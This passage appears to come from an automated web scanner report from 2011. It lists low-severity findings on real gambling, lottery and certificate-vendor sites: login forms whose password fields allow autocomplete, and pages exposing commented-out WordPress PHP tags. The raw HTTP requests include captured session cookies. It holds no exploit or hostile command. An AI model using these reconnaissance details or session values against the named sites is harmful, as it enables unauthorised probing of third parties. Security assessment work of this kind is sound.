
Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/skill/default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/skill/default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/skill/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 75595
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...


<form method="post" action="/en/skill/default.aspx" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.159. https://www.interwetten.com/en/sportsbook/default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/sportsbook/default.aspx

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/sportsbook/default.aspx

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/sportsbook/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:01 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:01 GMT
Content-Length: 321963
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

<form method="post" action="/en/sportsbook/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.160. https://www.interwetten.com/en/tennis-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/tennis-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/tennis-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/tennis-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:08 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:08 GMT
Connection: close
Content-Length: 228946
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/tennis-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.161. https://www.interwetten.com/en/volleyball-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/volleyball-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/volleyball-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/volleyball-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:10 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:10 GMT
Connection: close
Content-Length: 223303
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/volleyball-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.162. https://www.interwetten.com/en/water-polo-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/water-polo-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/water-polo-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/water-polo-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:19 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:19 GMT
Connection: close
Content-Length: 221931
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/water-polo-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.163. https://www.interwetten.com/en/winter-games-betting previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/winter-games-betting

Issue detail

The page contains a form with the following action URL:

https://www.interwetten.com/en/winter-games-betting

The form contains the following password field with autocomplete enabled:

ctl00$wucHeader$ucLogin$txtPassword

Request

GET /en/winter-games-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 221922
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<body id="ctl00_masterBody">

<form method="post" action="/en/winter-games-betting" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div class="aspNetHidden">
...[SNIP]...
<input name="ctl00$wucHeader$ucLogin$txtPasswordPlacebo" type="text" value="Password" id="txtPasswordPlacebo" class="logininput" onfocus="Global.SwitchObject(this,'txtPassword');" /><input name="ctl00$wucHeader$ucLogin$txtPassword" type="password" id="txtPassword" class="logininput password" onkeypress="Global.ExecuteOnKeyCode("__doPostBack('ctl00$wucHeader$ucLogin$btnLogin','')", event)" /><input type="submit" name="ctl00$wucHeader$ucLogin$btnLogin" value="Login" id="btnLogin" class="loginbutton" />
...[SNIP]...

13.164. http://www.postcodelottery.com/MyAccount.htm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/MyAccount.htm

Issue detail

The page contains a form with the following action URL:

http://www.postcodelottery.com/web/form

The form contains the following password field with autocomplete enabled:

f90908

Request

Response

13.165. http://www.tstglobal.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tstglobal.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://members.tstglobal.com/login.php

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.tstglobal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.166. http://www.verisign.co.uk/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/

Issue detail

The page contains a form with the following action URL:

https://products.verisign.com/geocenter/reseller/logon.do

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:15 GMT
Server: Apache
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29123

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...
</label>
                                       <input type="password"id="partner_password" name="password" size="16" maxlength="20" />
                                   </div>
...[SNIP]...

14. Source code disclosure previous next
There are 13 instances of this issue:

http://neogames-tech.com/
http://neogames-tech.com/careers
http://neogames-tech.com/contact-us
http://neogames-tech.com/corporate
http://neogames-tech.com/corporate/gaming-license
http://neogames-tech.com/products
http://www.neogames.com/
http://www.neogames.com/contact-us
http://www.neogames.com/corporate
http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group
http://www.neogames.com/news-and-events/neogames-launches-38-games-in-2010
http://www.neogames.com/our-partners
http://www.neogames.com/products

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

14.1. http://neogames-tech.com/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://neogames-tech.com
Path:	/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: neogames-tech.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 11483
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:38:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.2. http://neogames-tech.com/careers previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://neogames-tech.com
Path:	/careers

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /careers HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.3. http://neogames-tech.com/contact-us previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://neogames-tech.com
Path:	/contact-us

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /contact-us HTTP/1.1
Host: neogames-tech.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/corporate/gaming-license
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979

Response

HTTP/1.1 200 OK
Content-Length: 7505
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.4. http://neogames-tech.com/corporate previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://neogames-tech.com
Path:	/corporate

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /corporate HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.5. http://neogames-tech.com/corporate/gaming-license previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://neogames-tech.com
Path:	/corporate/gaming-license

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /corporate/gaming-license HTTP/1.1
Host: neogames-tech.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.2.10.1305545979

Response

HTTP/1.1 200 OK
Content-Length: 6775
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.6. http://neogames-tech.com/products previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://neogames-tech.com
Path:	/products

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /products HTTP/1.1
Host: neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=250931097.1305545979.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250931097.1972721854.1305545979.1305545979.1305545979.1; __utmc=250931097; __utmb=250931097.3.10.1305545979;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 9094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.7. http://www.neogames.com/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.8. http://www.neogames.com/contact-us previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/contact-us

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /contact-us HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.9. http://www.neogames.com/corporate previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/corporate

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /corporate HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 7306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' — ', __('« Newer Posts'), __('Older Posts »')); ?>

</td>
...[SNIP]...

14.10. http://www.neogames.com/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.neogames.com
Path:	/news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /news-and-events/january-2011-neogames-sign-a-deal-with-interwetten-group HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>

